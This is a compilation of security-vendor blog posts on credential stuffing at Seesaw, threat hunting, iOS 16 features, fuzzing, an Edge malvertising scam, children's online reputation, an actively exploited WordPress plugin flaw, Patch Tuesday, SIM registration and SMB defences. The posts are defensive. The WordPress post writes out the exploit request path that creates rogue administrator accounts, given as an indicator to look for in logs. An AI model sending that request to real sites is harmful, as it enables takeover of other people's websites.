IT NEWS

On Wednesday, parents and teachers reported that student learning platform, Seesaw, had been hacked after some users received an infamous explicit photo known as “goatse” on private chats. Schools from districts in Colorado, Illinois, Kansas, Michigan, New York, Oklahoma, South Dakota, and Texas all experienced similar issues, and began to send out warnings like the one below:

San Francisco-based Seesaw, which prides itself on having more than 10 million users, declined to comment on how many were affected.

In a news release, Seesaw said it wasn’t hacked but was compromised via “a coordinated ‘credential stuffing’ attack” in which widely available compromised credentials—email address and password combinations—were used to illegally take over Seesaw accounts.

“We have no evidence that the attacker performed additional actions in Seesaw beyond logging in and sending a message from these compromised accounts,” the notification said.

In an update, Seesaw said it has removed the inappropriate link, which is a bit.ly shortened URL, and undertook other actions to make sure that no one can access the link anymore.

“However, in a few instances, if the message was already loaded in a web browser or one of our apps, the message may have been cached on your device,” it added. “To ensure that no one has access to the inappropriate message, we recommend all everyone *refresh their web browsers and refresh their mobile apps*. On mobile, you can update your device to the latest app version (version 8.1.2, released today) and re-launch Seesaw OR close and re-open the Seesaw app.”

Seesaw has adjusted its detection and blocking feature and is slowly bringing back the messaging feature of the app after it temporarily disabled it as part of sorting out the compromise.

Say ‘no’ to password reuse

The Seesaw incident is a timely example of why it’s important for people not to reuse passwords across different accounts. Often when a breach occurs the stolen credentials are sold on to more cybercriminals who then try these logins on other sites.

To eradicate password reuse forever, get yourself a password manager to create and remember unique, complex passwords. All you need is one very long and very complicated password for the password manager itself—you can combine random words or think of a ridiculous phrase that is unguessable. 

Seesaw endorsed a guideline for creating and managing passwords by CISA (Cybersecurity & Infrastructure Security Agency). Responsible parents, teachers, and guardians would also be wise to heed this.

Stay safe!

When you hear the words “cyber threat hunting”, you just may picture an elite team of security professionals scouring your systems for malware. Sounds like something only huge businesses or nation states would need to do, right?

Not quite. Threat hunting is just as essential for small-and-medium-sized businesses as it is for larger organizations—for the simple reason that threat actors see SMBs as an easy way to make a quick buck.

Cybercriminals know that most SMBs don’t have the budget for robust cybersecurity technology or seasoned security professionals. And when hackers attack, it stings: In 2021, the average cost of a data breach for businesses with less than 500 employees was $2.98 million.

Threat hunting can weed out malware before anything bad like a data breach can happen. Unfortunately, cyber threat hunting is more difficult for SMBs to do than it is for large organizations due to the aforementioned resource constraints. That’s where Managed Detection and Response (MDR) can help. 

In this article, we’ll review what MDR and threat hunting are, and how exactly MDR can help SMBs with cyber threat hunting.

What is cyber threat hunting?

Consider the fact that, when a threat actor breaches a target network, they don’t attack right away. The median number of days between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed. In fact, 23% of intrusions lead to ransomware, 29% to data theft, and 30% to exploit activity—when adversaries use vulnerabilities to initiate further intrusions.

Threat hunting is all about nipping these sorts of stealthy attackers in the bud. And not only dormant attackers, but dormant malware too.

Threat hunting arrived on the scene as an important security practice with the increased prevalence of unidentifiable or highly-obfuscated threats—those that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

The bad news for SMBs: Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC). That’s where MDR comes in.

What is MDR?

Managed Detection and Response, or MDR, is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack. Using a combination of Endpoint Detection and Response (EDR) technology and human-delivered security expertise, an MDR service provides advanced attack prevention, detection, and remediation, as well as targeted and risk-based threat hunting. 

The core service capabilities of MDR include:

• 24×7 monitoring of an organization’s environment for threats.

• Threat detection, alerting, and response from highly experienced security analysts.

• Correlation of endpoint alerts with other data sources to identify threats and response measures more effectively.

• Proactive cyber threat hunting based on past (and newly reported) indicators of compromise (IOCs)

So, as you can see, MDR is much, much more than just threat hunting.

While it’s technically possible for SMBs to build out their own MDR program in-house, doing so is a time, expense, and effort equivalent to starting an entirely new IT security department. You’ll need to build out your own SOC facilities, hire a minimum of five full-time employees to provide 24/7 coverage, and so on.  That’s why many SMBs opt to outsource their MDR to a service provider. 

In short, MDR is a service designed to protect an organization’s data and assets, even if a threat eludes EDR security detection. Outsourcing your MDR alleviates the capital expenditures (CapEx) of purchasing a SIEM or other security tools and gives SMBs fast time-to-market to immediately address your organization’s security needs.

Cyber threat hunting and MDR

Now, let’s bring this thing full circle: what does threat hunting for SMBs look like as a managed service? 

Threat hunting typically includes two essential functions in the delivery of MDR services. The first one is research-based threat hunting where security analysts look, or “hunt,” for known attackers or adversarial behaviors listed in threat intelligence services.

“Let’s say we get our intelligence and it says listen, if you see these five files with this hash, it’s most likely this attack. Because we understand the tools, tactics, and motives of the adversary, we can say oh, look, we just found one of those five files,” says Bob Shaker, VP, Managed Services at Malwarebytes.

“We know they’re trying to steal certain types of data. I’m gonna go look and see if that data is being exfiltrated. And there it is. There’s a folder created and all the data is being copied into this folder. This is that attack.”

The second approach is active threat hunting, where security analysts systematically review your organization’s environment to uncover any current suspicious activity or newly emerging IOCs that are in progress.  

Shaker explains this second approach: “Here’s how it works: Intelligence and data comes into the MDR team. The team creates playbooks that execute against the customers’ environment, looking at the EDR data that’s been collected for one of those indicators of compromise.”

“When an IOC is found in the EDR data, the analyst takes the next step to investigate wherever it was found to determine if it’s an attack or not. If not, they mark it as a false positive. And if it is, they take whatever the appropriate steps are that the customer allows them to take. Then they notify the customer with potential remediation actions, such as deletion, quarantine, blocking, and the customer chooses.”

Shaker further notes that, if a threat slips through the cracks of your MDR provider and an attack is successful, then there’s nothing your MDR can do anymore. The point of MDR is to do everything it can to stop the threat at the point of attack: after that, your incident response company takes over.

SMBs need cyber threat hunting—and MDR can help them do it 

Threat hunting is essential for small-and-medium-sized businesses, as attackers can potentiall remain undetected for over two weeks after compromising a network. 

Unfortunately, threat hunting is complicated and requires a dedicated SOC and seasoned cybersecurity staff, barring most SMBs from utilizing this important security practice. In this article, we’ve outlined how outsourcing your threat hunting to an MDR service can help.

Want to learn more about MDR and threat hunting? Check out the resources below. 

Featured articles 

What is Threat Hunting?

What is Threat Intelligence?

What is MDR?

What is SIEM?

What is SOC?

Webinar: Malwarebytes EDR Product Demo

On Monday, September 12, Apple released iOS 16, which included a host of new security and privacy features.

Let’s look at what these are—and some quality-of-life (QoL) changes. 

Lockdown Mode

As Macrumors calls it, Lockdown Mode is an “extreme” security setting ideal for those who regularly find themselves in the crosshairs of online risk and targeted sophisticated cyberattacks: Activists, journalists, and government officials.

Although this mode was made with a small fraction of iPhone users in mind, anyone can enable and use it.

Lockdown Mode disables and “strictly” limits many iPhone features when enabled, which requires restarting the device and entering a passcode. This mode blocks (among others) messages with attachments, FaceTime calls from people with whom you have no call history, and wired connection with other devices if the iPhone is locked.

Passkey

As we mentioned earlier this week, passkeys are a “password killer” and are used instead of passwords to sign in to a website or app. It may seem complicated if you dig into the details, but in practice it may be as simple as using Face ID or Touch ID.

Passkeys aim to help protect users from phishing attacks, malware, and other campaigns designed to steal accounts or unlawfully gain access to them.

Clipboard consent

Copying and pasting from the clipboard now requires explicit permission from the user. Apps are now forced to get consent the same way as when they ask for access to the phone’s camera, microphone, and other sensitive data.

Known Wi-Fi networks editing

Here’s another handy feature that makes users aware of all the Wi-Fi networks they have previously connected to so they can properly disconnect or forget that connection, even when they’re not in range of the network anymore. Users can also view details about these networks.

Not only that, if iCloud Keychain is enabled on all your Apple devices, users will also see a listing of Wi-Fi hotspots those devices have connected to in the past. This listing is under Known Networks, which you can navigate to from Settings > Wi-Fi > Edit.

It’s important to clear out old Wi-Fi hotspot connections so your device won’t auto-connect to them in the future, especially if a hotspot owner still uses the same insecure password.

Wow, it’s frightening to see the networks in this list. So many generic hotel and airport networks that I never remembered to “forget” while still connected, and my phone would have happily tried to join any network with the same name. 😳

Thanks, @Apple, for adding this! 🙂 pic.twitter.com/txLtHfroDZ

— Thomas Reed (@thomasareed) September 13, 2022

Rapid security response

Software updates are essential. With so many exploits, one cannot afford to leave software unpatched. Apple has made it easier for iPhone users to apply security updates without updating the entire OS. This will also make the download of those updates quicker.

Users have the option to turn this feature on or off.

Safety Check

Safety Check is a new feature under Settings. Once again, this was built with ease and functionality in mind. If users want to reset all data and location access granted to apps and other people, they can do so with Safety Check.

This feature is not just for general privacy reasons, but also aimed people in complicated and abusive relationships, especially those with violent partners. A “Quick Exit” button also takes the user to the iPhone’s Home screen in case they don’t want to be caught using the Safety Check feature.

Safety Check has two options: Emergency Reset and Manage Sharing & Access. The former will instantly freeze information sharing with people and apps with one tap. It’ll also remove all emergency contacts and reset your Apple account (ID and password).

The latter—Manage Sharing & Access—gives you a birds-eye view of what data you’re sharing with whom and with what apps. If you think someone is secretly tracking or monitoring you, you go here to check. The user can cherry-pick what data they want to share with who or if they want to completely stop sharing with this person(s) or app(s).

Face ID

Face ID is a staple on iOS, but some Apple fans may find it a tad annoying to use it only in portrait orientation. This is no longer the case for those using iPhone 13 and above. They can now use Face ID in either portrait or landscape orientation after updating to iOS 16.

Overall, it appears Apple has attempted to cover as much ground as possible. Some new features, unrelated to security or privacy, like Live Captions, are aimed at deaf and hard-of-hearing users.

You can read more about iOS 16’s new features on this page.

Fuzzing, or fuzz testing, is defined as an automated software testing method that uses a wide range of invalid and unexpected data as input to find flaws in the software undergoing the test.

The flaws do not necessarily have to be security vulnerabilities. Fuzzing can also bring other undesirable or unexpected behavior of the software to light. But it’s good to realize that bugs discovered through fuzzing account for the majority of new CVE entries.

The purpose

Ensuring software quality is becoming more essential, but sometimes collides with deadlines, complex software engineering, and dependencies on other software. As such, fuzzing has become part of the quality assurance (QA) procedure before software is released. But it doesn’t stop there. After the release, the number of testers might go up, but not every one of them will be doing it for your benefit.

Fuzzing is particularly useful for exposing potential security vulnerabilities like:

• Memory leaks. A memory leak is a type of bug that occurs when a computer program incorrectly manages memory allocations in a way that memory which is no longer needed is not released. Memory leaks slow down the system up to a point where the system or the running process crash.
• Control flow errors and other runtime errors. A control flow error is an erroneous jump throughout an executing program induced by external disturbances. Runtime error is an umbrella term for any error that occurs during execution of a program.
• Race conditions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended.

All these types of bugs can be exploited when the outcome is more or less predictable and can be used to work in the attackers’ advantage. The goal of fuzzing for bug bounty hunters is to induce unexpected behavior of an application and see if it leads to an exploitable bug.

Input types

The idea behind fuzzing is to release different types of input and look for hiccups. A crash or other strange behavior may mean that you are on to something. After the test you can repeat the input that caused the abnormality and test similar types of input to work out what might be the underlying reason. Causing unexpected behavior is only the first step when you are working out a vulnerability.

An application may have more than one attack surface. One can, for example, pass arguments to an application in several ways: Through the graphical user interface (GUI), by using command line options, or by using it on malformed or specially crafted files.

Web applications

The software undergoing the fuzzing can also be a web application. Web application fuzzing is mostly deployed to expose common web vulnerabilities, like injection issues, cross-site-scripting (XSS), and more. When testing online web applications, keep in mind that you want to test the application itself, not the infrastructure it is running on. In other words, leave some room for the regular users.

Test types

While it is understandable that at face value fuzzing sounds as if you are about to throw the kitchen sink at an application and see what sticks, but even fully automated methods will be more effective with some preparation. The input used to fuzz an application could either be crafted for a specific purpose, or randomly generated, but it helps to exclude input types that you already know the application will not accept.

A common approach to fuzzing is to define lists of values that have a bigger chance of raising an issue (fuzz vectors) for each type. These can be extremes, like very large numbers, or known issues from similar applications, like escaped characters or Structured Query Language (SQL) commands.

Rules of engagement

Note that many applications take exception to uninvited penetration testing. Check if the developer or owner of the software you want to scrutinize has a bug bounty program and read the guidelines to participate. Depending on which country you live in, and where the software owner resides, you could be breaking the law if you don’t follow the rules.

Existing fuzzing software

Below are some interesting leads if you want to find more in-depth information about fuzzing.

OSS-Fuzz is a fuzzing platform to make open source software more secure and stable. It was launched by Google as a response to the Heartbleed vulnerability. To be accepted to OSS-Fuzz, an open-source project must have a significant user base and/or be critical to the global IT infrastructure. Since its launch, OSS-Fuzz has become an important service for the open source community, helping get more than 8,000 security vulnerabilities and more than 26,000 other bugs in open source projects fixed.

One of the most well-know fuzzing tools is Burp Suite. Burp Suite is a powerful tool out of the box, but it can grow with you as you become more experienced. The professional version offers the opportunity to integrate automated and semi-automated processes with manual tooling. If you are starting or want to try it first, there is a Community Edition, or you can trial the Professional version for 30 days.

Another web app scanner which is certainly worth mentioning is OWASP ZAP. OWASP Zed Attack Proxy (ZAP) is a free, open-source penetration testing tool being maintained under the umbrella of the Open Web Application Security Project (OWASP). ZAP is designed specifically for testing web applications, and is both flexible and extensible. At its core, ZAP is what is known as a machine-in-the-middle proxy. It stands between the tester’s browser and the web application so that it can intercept and inspect messages sent between browser and web application, modify the contents if needed, and then forward those packets on to their destination.

OWASP ZAP in action

Many other free fuzzing tools can be found if you search for them, and some are really useful for specific purposes, but you should keep in mind that most of them require an advanced knowledge level before you can expect any useful results. Many are command line tools and/or require you to have Python installed.

Even then it can be a steep learning curve, but it is one that is well worth it, in my opinion. Let us know your experiences in the comments, below.

While Google Chrome still dominates as the top browser, Microsoft Edge, which is based on the Chromium source code, is gradually gaining more users. Perhaps more importantly, it is the default browser on the Microsoft Windows platform and as such some segments of its user base are of particular interest to fraudsters.

We have tracked and observed a malvertising campaign on the Microsoft Edge News Feed used to redirect victims to tech support scam pages. The scheme is simple and relies on threat actors inserting their advertisements on the Edge home page and trying to lure users with shocking or bizarre stories.

In this blog post, we raise awareness and expose this scam operation that has been going on for at least two months.

Overview

The Microsoft Edge News Feed is a collection of thumbnails alternating between news content, traffic updates and advertisements. We have identified several ads that are malicious and redirect unsupecting users to tech support scams.

The redirection flow can be summarized in the diagram below:

Technical details

When a user clicks on one of the malicious ads, a request to the Taboola ad network is made via an API (api.taboola.com) to honor the click on the ad banner. The server will respond with the next URL to load, with the folling format:

document.location.replace('https://[scammer domain]/{..}/?utm_source=taboola&utm_medium=referral

The first request to one of those malicious domains retrieves a Base64 encoded JavaScript whose goal is to check the current visitor and determine if they are the potential target.

An original version of this script can be found here, while a beautified version can be found here.

The goal of this script is to only show the malicious redirection to potential victims, ignoring bots, VPNs and geolocations that are not of interest that are instead shown a harmless page related to the advert.

This scheme is meant to trick innocent users with fake browser locker pages, very well known and used by tech support scammers. What’s worth noticing is the cloud infrastructure that is being leveraged here, making it very difficult to block.

These are subdomains on ondigitalocean.app which are constantly changing; in the span of 24 hours, we collected over 200 different hostnames.

Infrastructure

The advertisements displayed on the Edge News Feed are linked with the following domains (this list is not exhaustive):

• feedsonbudget[.]com
• financialtrending[.]com
• foddylearn[.]com
• glamorousfeeds[.]com
• globalnews[.]cloud
• hardwarecloseout[.]com
• humaantouch[.]com
• mainlytrendy[.]com
• manbrandsonline[.]com
• polussuo[.]com
• newsagent[.]quest
• newsforward[.]quest
• puppyandcats[.]online
• thespeedoflite[.]com
• tissatweb[.]us
• trendingonfeed[.]com
• viralonspot[.]com
• weeklylive[.]info
• everyavenuetravel[.]site

One of the domains,tissatweb[.]us, which was also publicly reported for hosting a browser locker has interesting whois data:

Registrant Email: sumitkalra1683@gmail[.]com

That email address is associated with the following additional domains:

The email address belongs to an individual named Sumit Kalra who is listed as a director for Mws Software Services Private Limited, a company located in Delhi whose principal business activity is “Computer and related activities”.

Protection

This particular campaign is currently one of the biggest we are seeing in terms of telemetry noise.

The fingerprinting to avoid detection is interesting and more sophisticated than usual. We will continue to expose and report abusive infrastructure used for scams.

Malwarebytes users were already protected against this tech support scam thanks to our Browser Guard extension.

Whether your child has been socially active online for a while now or you just handed your young one their first ever smartphone, now is an excellent time to think about managing their online reputation.

The concept may sound overwhelming, but doing it is easy. Since you’re no doubt talking to your kids about how to keep themselves safe online, you might as well open up about online reputations and how to create or maintain a positive one.

What’s an online reputation?

An online reputation is a culmination of what you post online about yourself and what other people post about you. Essentially, it’s your child’s online presence seen from the point-of-view of other people. Your child must understand what they should and shouldn’t be sharing online, publicly on social media, or privately in chat.

It’s equally crucial for your child to understand that what they do online can adversely affect others and themselves offline.

Why should your child manage their online reputation?

In principle, managing a personal online reputation is similar to how businesses manage theirs. Business owners know the value of having a good reputation online—it opens up excellent business opportunities, and increases trust and loyalty of the brand.

A positive reputation is important to individuals, too. Otherwise, people miss out on job opportunities they like or may not get admitted to good schools, among others. The first scenario is particularly true since employers often check applicants’ social accounts to get a glimpse of who they are as part of the hiring process.

Online reputation management 101

Here are some lines of conversation you can use to help kids learn about managing their online reputation:

Think before you post

A pre-teen or a teen may already know about this, but it’s essential to keep driving this home. Once something is on the internet, it can’t be fully taken back, even if it’s deleted. If in doubt, don’t post it.

There’s a story of one Twitter user who got accepted at the most coveted NASA internship. But because a tweet contained vulgar language and “NASA” was hashtagged, a former NASA engineer saw the tweet and commented on the language this user used. NASA eventually canceled the internship.

Private things should stay private, but sometimes they don’t

While one should be careful about what they post online in public, your kid should also know what not to post or share in private. 

Stress that just because they post something privately doesn’t mean it’ll remain private. Secrets get passed on, accounts get hacked, and online repositories get breached, leaking sensitive data. It’s best not to share something you don’t want millions of internet users to see.

Carolyn Bunting, CEO of Internet Matters, an organization that aims to teach parents on how to keep their children safe online, says it best: “A good general rule when it comes to content is the T-shirt test—if you wouldn’t wear it on a T-shirt, then don’t post it online.”

Err on the side of caution. We’ve heard countless stories of inappropriate images being passed around because someone decided to trust their partner with their sensitive photos.

Be positive with how you conduct yourself online

Agree with your child that, to the best of their abilities, they will:

• Be respectful of others.
• Be kind and helpful.
• Stick to the rules.

We teach our kids these rules when navigating the real world, and the same rules should apply online.

This is also an excellent opportunity to talk to them about the many personas they might encounter online. The most notable are the bully, the troll, and the groomer. 

Tell them to block a user and report them to the site they’re on if they see any bullying, trolling, and grooming behavior. And it’s not just social media, blocking and reporting should apply to video gaming communities with which your child is associated as well.

Search yourself

It’s safe to assume that everyone who uses the internet has entered their name into a search engine at least once.

Searching your child’s name is a good way to check what people have said about them across multiple social media posts. You can also search for their email address, account usernames, and phone numbers to see if these have made their way into some corner of the internet. And make this a regular thing.

If, say, an email address ends up in a list of leaked data that you or your child is not aware of, you now know they need to change their password and (perhaps begrudgingly) enable two-factor authentication (2FA).

Let’s make it right

We all make mistakes, and we often believe such mistakes will continue to haunt our online lives. Because the internet never forgets—or at least that’s what the adage says.

To a degree, that is true, as some organizations keep data about all of us, not giving us a deadline for deletion. Many internet users can now appeal to “higher powers” to be forgotten. There’s a lot of reading and understanding involved in this subject, so ensure you and your child understand their rights and how they can submit a request.

Your child’s past shouldn’t define their future. People eventually grow up. Their thoughts and feelings about certain things change—often for the better. So if there is anything online that shows incriminating content about or from your child, make it right together by filing for takedowns. 

Final thoughts

Every internet user has a sort of brand reputation, whether or not they are aware of this. The sooner you tell your kids about online reputation and the importance of having and maintaining a good one, the better they will be at leaving positive digital footprints online early on.

More than words, parents and guardians should also model the behavior. Thankfully, it’s never too late to start.

There’s been a few WordPress plugin vulnerabilities in the wild recently, and today we have another one to add to the list. Sometimes when word breaks of a WordPress plugin issue, a fix is already available and all you have to do is perform an update. On other occasions, the attack is live and out there doing damage with no fix yet available. Sadly, this current exploit is an example of the latter.

WPGateway allows WordPress users to run WordPress sites from one dashboard. Unfortunately, research shows that part of this functionality puts both the site and the site’s users at risk.

Beware of rogue admins

The issue in question allows unauthenticated individuals to add rogue users to the site. Those unauthorised users have full admin privileges, which essentially results in a full site takeover thanks to the plugin.

At this point, the compromiser can do what they want with the hijacked website. They are in full control, which is not a great situation for anybody. The vulnerability is listed on the Common Vulnerabilities and Exposures site as CVE-2022-3180. However, no additional information is forthcoming yet as the page has merely been reserved at this point.

Active exploitation

The issue was first discovered on September 8, and is being actively exploited. There is very little additional information to go on at this point, as the specifics of the vulnerability are being withheld. As a result, people will largely be reliant on the WPGateway team to get a patch put together.

Detecting and avoiding compromise

Options are limited, but for now the main advice from Wordfence is this:

• Remove the plugin installation until a patch is made available.

• Check for malicious admin accounts in your WordPress dashboard. The username  “rangex” is a common indicator of compromise.

You can also check site access logs for requests to: //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1. This indicates an attack attempt was made, but does not mean your site has been compromised. This is why checking for the “rangex” username is so important. Fingers crossed that this issue will receive a speedy patch from the plugin developers.

Stay safe out there!

The Microsoft September 2022 Patch Tuesday includes fixes for two publicly disclosed zero-day vulnerabilities, one of which is known to be actively exploited.

Five of the 60+ security vulnerabilities were rated as “Critical”, and 57 as important. Two vulnerabilities qualify as zero-days, with one of them being actively exploited.

Zero-days

The first zero-day, CVE-2022-37969, is a Windows Common Log File System Driver Elevation of Privilege (EoP) vulnerability. An attacker who successfully exploits this vulnerability could gain SYSTEM privileges, although the attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system. This flaw is already being exploited in the wild.

Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

The second zero-day, CVE-2022-23960, is an Arm cache speculation restriction vulnerability that is unlikely to be exploited. Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mis-predicted branches. Then, cache allocation can allow the attacker to obtain sensitive information. The vulnerability was disclosed in March by researchers at VUSec.

The critical vulnerabilities

CVE-2022-35805 and CVE-2022-34700 are both Microsoft Dynamics CRM (on-premises) Remote Code Execution (RCE) vulnerabilities. An authenticated user could run a specially crafted trusted solution package to execute arbitrary SQL commands. From there the attacker could escalate and execute commands as db_owner within their Dynamics 365 database.

CVE-2022-34718: a Windows TCP/IP RCE vulnerability with a CVSS score of 9.8 out of 10. An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPSec is enabled, which could enable a remote code execution exploitation on that machine. Only systems with the IPSec service running are vulnerable to this attack. Systems are not affected if IPv6 is disabled on the target machine.

CVE-2022-34721 and CVE-2022-34722: are both Windows Internet Key Exchange (IKE) Protocol Extensions RCE vulnerabilities with a CVSS score of 9.8 out of 10. An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation. The vulnerability only impacts IKEv1. IKEv2 is not impacted. However, all Windows Servers are affected because they accept both V1 and V2 packets.

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones:

• Adobe released seven patches addressing 63 security holes in Adobe Experience Manager, Bridge, InDesign, Photoshop, InCopy, Animate, and Illustrator.
• Earlier this month, the Android security bulletin for September came out, which was followed up with a Pixel specific update.
• Apple fixed at least two zero-day vulnerabilities when it released updates for iOS, iPadOS, macOS and Safari.
• Cisco released security updates for numerous products this month.
• Google released a fix for a Chrome zero-day.
• Samsung has released a new security update for major flagship models.
• SAP published its September 2022 Patch Day updates.
• VMware released security advisory for VMware Tools.

Stay patched!

The registration of SIM cards tied to a verified identity is back in the news, off the back of large-scale phone fraud. In what some may call a knee-jerk response to a problem, there are calls to revive a legal bill and make it law. What’s happening, and what are the potential ramifications?

Hitting spam with the registration hammer

More than 1 billion suspicious messages and spam texts have been sent in the Philippines in 2022 so far. These messages run the usual range of phishing and fraudulent transaction attempts. This is enough to have Senators calling for “tougher measures” on cybercrime.

This would be in the form of a bill drafted earlier in the year, aiming to have social media users register legal identities and phone numbers. Turned down due to a lack of detail and guidelines which “may give rise to a situation of dangerous state intrusion and surveillance threatening many constitutionally protected rights”, it’s now back on the table. The problem is, there appears to be no fix for privacy invasion and the more general concerns outside of social media use.

The weaving web of SIM registration

Tying SIM cards to real world identity registration is an idea which has been around for a long time. In many places, there doesn’t appear to be much of an appetite for such a policy. In the UK, for example, you can buy any SIM of your choosing with cash and start using it in your phone, although that’s not to say mandatory registration of one form or another doesn’t exist.

China has a well known daisy-chain of registrations for all manner of online and offline activities. Real name registration is tied to online accounts, which as noted by Comparitech means there’s no way to make anonymous accounts when combined with SIM registration.

Elsewhere, several nations have put it forward as a legal suggestion only to go on and retract the idea. It’s the very definition of a “blowing hot and cold” topic.

The risks of SIM registration

There are many potentially harmful privacy issues where tying ID to SIM purchasing is concerned.

1. Oppressive regimes are only too happy for people trying to evade censorship to become tangled up in registration schemes. The chilling effect on free speech is overt in these scenarios.

2. People and families at risk from domestic abuse may struggle to register a SIM, especially in situations where money is tight or they’re on the run without identity documents. It’s also one more database for all their information to wind up on, with the possibility of a breach and leak down the line.

3. You can almost guarantee any such data will be plugged into marketing and advertising, especially in places where there’s no provision to expressly forbid such a thing. This could easily tie back to point 2 in several ways which aren’t beneficial to the person under threat.

Kicking the can down the road?

At a time when tracking, data disclosure, and location issues are coming under increasing scrutiny, this feels very much like something not likely to get off the ground in places where it doesn’t already exist. We suspect that if you don’t have this in place currently, it’s not something you should be overly concerned about for the time being.

The intel you need to secure your business—delivered straight to your inbox

From industry tips and best practices to the latest Malwarebytes product releases and how-tos, our Business newsletter is chock-full of the best of our business blog. Subscribe to our Business newsletter today.

Now more than ever, threat actors are trying to attack company networks. In fact, there were 50% more attack attempts per week on corporate networks globally in 2021 than in 2020.

Small-and-medium-sized businesses need to be on the lookout particularly, as cybercriminals are more likely to target them for their perceived (and sometimes actual) lack of cyberdefenses.

This article focuses on helping to prevent cyberattacks purely through technology; though of course, businesses need a combination of technology, people, and strategy to truly become cyber resilient. 

That being said, security experts advise against relying solely on a single technology or technique to protect business endpoints. Effective prevention requires a layered approach capable of addressing not only today’s threats, but preventing tomorrow’s as well. 

In this post, we break down five must-have technologies that help prevent cyberattacks for SMBs.

Your level of prevention is determined by how much risk you accept to take on

There are two extremes to prevent cyberattacks: Overly permissive prevention and absolute prevention—and where you fall on that spectrum depends on the level of risk in your organization.

Let’s start over at one end of the extreme. 

In the medical industry for example, doctors in large hospitals use a virtual machine. The machine they use operates in a virtual environment, and that virtual environment is destroyed and recreated when they log back in in another room. They can’t install anything or change anything. Data is kept separate. 

Moving towards the other end of the extreme, you might find startups or smaller companies with very lax prevention. Something like, “Here’s a laptop. We’ve provided you with the basic software, call us if you have a problem.”

What’s important to note here is that, because the risk level of every organization is different, there’s no “one-size-fits-all” approach to prevent cyberattacks. Your level of prevention will vary drastically depending on industry, company size, and so on.

Having said that, the average small-to-medium-sized business falls somewhere in the middle of these two extremes. At a medium level of risk, you want to find that perfect balance between too strict and too permissive. 

Remember the maxim: The cyberattacks you cannot prevent, you need to mitigate. For mitigation, we assume your business uses (outsources) endpoint detection and response—but you still need the right technology to prevent cyberattacks in the first place. Especially ransomware. 

Read Our Defender’s Guide to Ransomware Resilience!

The question for any IT leader then is: What can I prevent, without slowing down my business?

5 technologies that help prevent cyber attacks for SMBs (ranked in order of importance)

(Note: these aren’t hard-and-fast rankings, just a good rule of thumb. They may look different for your individual business—for example, you might put 2FA first before anything else and that’s totally OK.)

1. Endpoint protection

Before anything else, endpoint protection should be the first thing you set out to pair with your EDR.

Through a combination of web protection, application hardening, and more, EP provides businesses with full attack chain protection against both known and unknown malware, ransomware, and zero-hour threats. Multi-stage attack protection provides the ability to stop an attacker at every step.

Read our “Endpoint Protection Buyers Guide” for details of the core requirements to help you navigate your enterprise endpoint protection solution analysis, which provides a solution questionnaire to help you with your evaluation process.

Read more: What is endpoint protection?

2. Vulnerability assessment AND patch management (tied) 

Hold on a sec, you’re telling me vulnerability assessment and patch management are preventative? Don’t both of these mitigate being compromised, since the vulnerability is already technically present?

Well, sure—but the only surefire way to prevent a vulnerability from being exploited is through patching it. Therefore, the process of finding vulnerabilities (and categorizing them by severity) so that you can then systematically patch them before they can be exploited, are two vital preventative measures.

And no, you don’t want to do either of these things manually if you can help it. A vulnerability assessment platform can automatically find and score vulnerabilities with the Common Vulnerability Scoring System (CVSS), while a patch management platform can help you patch those vulnerabilities automatically.

Read more: Vulnerability response for SMBs: The Malwarebytes approach

3. DNS filtering

The next technology you need to prevent cyberattacks is a DNS filter. But first, a little bit about what DNS (domain name system) is. 

Every time a customer types in your web address, their computer makes a request to a DNS server. The DNS server, in turn, tells the computer where to go. If all goes well, then voila, your customer is at your website. 

A DNS filter prevents you from accessing unsafe websites—including those posing a strong malware risk. But which web-based cyberthreats in particular does DNS filtering stop, you ask? There are three big ones:

• Phishing: If you have a DNS filter, as soon as someone in your business clicks a link to a malicious website, they’re prevented from visiting it. 

• DDoS attacks: Being able to continuously monitor DNS activity is a great way to catch the warning signs of a DNS DDoS attack—and with a DNS filter, you can do exactly that.

• Machine-in-the-middle attacks: A good DNS filter uses DNS encryption, which secures the connection between your computer and the DNS resolver. That way, cybercriminals cannot sit between you and feed you spoofed DNS entries.

Read more: 3 ways DNS filtering can save SMBs from cyberattacks

4. Cloud scanning

No matter what cloud storage service you use, you likely store a lot of data: A mid-sized company can easily have over 40TB of data stored in the form of millions of files. 

Needless to say, it can be difficult to monitor and control all the activity in and out of cloud storage repositories, making it easy for malware to hide in the noise as it makes its way to the cloud. That’s where cloud storage scanning comes in.

Most cloud storage apps already have malware-scanning capabilities. However, businesses use multiple different cloud storage repositories, and due to lack of integration options, they are unable to get a centralized view of all of their scan results, across multiple repositories, in a single pane of glass.

To better prevent cyberattacks, look for a cloud scanning service that uses multiple anti-malware engines, using a combination of signatures, heuristics and machine learning to increase detection rates. Also, look for one that provides a comprehensive view to monitor the health of all your enterprise data.

Read more: Cloud-based malware is on the rise. How can you secure your business?

5. 2FA

Two-factor authentication (2FA) is a cost-effective option for SMBs. 2FA adds an extra layer of protection by asking users to provide two forms of identification to prove their validity.

According to Robert Zamani, Regional Vice President, Americas Solutions Engineering at Malwarebytes, 2FA is relatively quick and easy to implement.

“2FA is simple.” says Zamani. “You roll a device quickly, you enroll a device—that’s something they have, which is usually a smartphone—something they know, which is a password—and then you enforce password minimum.”

Read more: Understanding the basics of two-factor authentication

Bonus: Cyber insurance 

OK, it’s not a technology, but hear me out.

Let’s say your business has just suffered a data breach and it’s time to dig deep in your pockets to pay all the resulting expenses. Without cyber insurance, you can expect to pay a dizzying amount of cash.

